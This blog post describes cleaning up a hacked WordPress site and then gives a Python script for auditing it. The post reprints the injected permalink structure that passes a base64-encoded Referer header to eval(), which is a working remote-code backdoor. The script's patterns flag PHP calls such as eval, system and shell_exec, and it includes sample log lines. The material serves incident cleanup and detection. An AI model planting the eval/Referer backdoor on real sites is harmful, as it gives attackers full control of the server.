WordPress Hack
I’ve been working on Steve’s hacked blog and I think I found what happened. As I browsed his data I kept finding all of this SQL injection stuff and then I found one of PHP’s most dangerous commands – eval().
eval() takes a string and executes it as if it were PHP code, even though that code was never written into the program. If an attacker can get his own input into an eval() call, he can execute any command he wants on the server.
I found the eval on Steve’s blog in the permalink decode. This is the entry that makes a blog have real page URLs like the one below (look at the URL for this post and you might see one):
/%year%/%monthnum%/%day%/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
It might not be obvious, but with that structure in place all an attacker has to do is request any page and put the malicious code, base64-encoded, in the Referer header of the web request: the server decodes that header and hands the result straight to eval().
Now I have to see if I can get it out.
Update: I cleaned a lot of crap out of Steve’s DB. There was a huge file in his uploads directory that gave hackers complete control over his site and would even decode the root password. I don’t know what they were doing with it. Steve was getting lots of spam, but the uploaded code could also send out spam.
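The two things worth checking on a site like this are the stored permalink structure and the access log for base64 Referer headers, since that is the channel the injected eval() reads from. The script below is an added example, not code from the original post: it audits a permalink_structure value against WordPress's documented rewrite tags (the KNOWN_TAGS list is my assumption of what a clean value may contain) and flags log lines whose Referer is strict base64 decoding to PHP. The option value and the two log lines are constructed samples.

```python
import base64
import re
# Rewrite tags WordPress documents for permalink structures (assumption: a clean value uses only these).
KNOWN_TAGS = {"year", "monthnum", "day", "hour", "minute", "second", "post_id", "postname", "category", "author"}
# PHP calls and superglobals that have no business in an option value or a Referer header.
PHP_CALLS = re.compile(r"\b(eval|assert|base64_decode|system|exec|passthru|shell_exec|phpinfo)\s*\(", re.I)
SUPERGLOBAL = re.compile(r"\$_(GET|POST|REQUEST|SERVER|COOKIE)\b")

def audit_permalink_structure(structure):
    """Return findings for a wp_options permalink_structure value; [] means it looks clean."""
    findings = []
    for tag in re.findall(r"%([^%/]*)%", structure):
        if tag not in KNOWN_TAGS:
            findings.append(f"unknown rewrite tag: %{tag[:20]}%")
    if re.search(r"[(){}\[\]|$]", structure):
        findings.append("regex or PHP metacharacters in structure")
    findings += [f"PHP call: {m.group(1)}(" for m in PHP_CALLS.finditer(structure)]
    findings += [f"superglobal: $_{m.group(1)}" for m in SUPERGLOBAL.finditer(structure)]
    return findings

def referer_decodes_to_php(referer):
    """True when a Referer value is strict base64 whose plaintext looks like PHP (a URL is not)."""
    try:
        decoded = base64.b64decode(referer, validate=True).decode("utf-8", "replace")
    except ValueError:  # not base64, e.g. an ordinary http:// referer
        return False
    return bool(PHP_CALLS.search(decoded) or SUPERGLOBAL.search(decoded))

def flag_log_lines(lines):
    """Scan combined-format access log lines; return (client_ip, referer) for each hit."""
    hits = []
    for line in lines:
        m = re.match(r'(\S+) .*?"[^"]*" \d{3} \S+ "([^"]*)"', line)
        if m and referer_decodes_to_php(m.group(2)):
            hits.append((m.group(1), m.group(2)))
    return hits

# Constructed samples standing in for the wp_options row and two access-log lines.
CLEAN_STRUCTURE = "/%year%/%monthnum%/%day%/%postname%/"
INFECTED_STRUCTURE = ("/%year%/%monthnum%/%day%/%postname%/"
                      "%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/")
LOG_LINES = [
    '198.51.100.7 - - [10/Oct/2009:13:55:36 -0700] "GET /2009/10/10/hello/ HTTP/1.1" '
    '200 512 "http://example.com/" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2009:13:56:01 -0700] "GET /2009/10/10/hello/ HTTP/1.1" '
    '200 512 "' + base64.b64encode(b"phpinfo();").decode() + '" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(audit_permalink_structure(INFECTED_STRUCTURE), flag_log_lines(LOG_LINES))
```

On a live site, feed it the value from `SELECT option_value FROM wp_options WHERE option_name = 'permalink_structure'` and the web server's access log; a clean structure returns no findings.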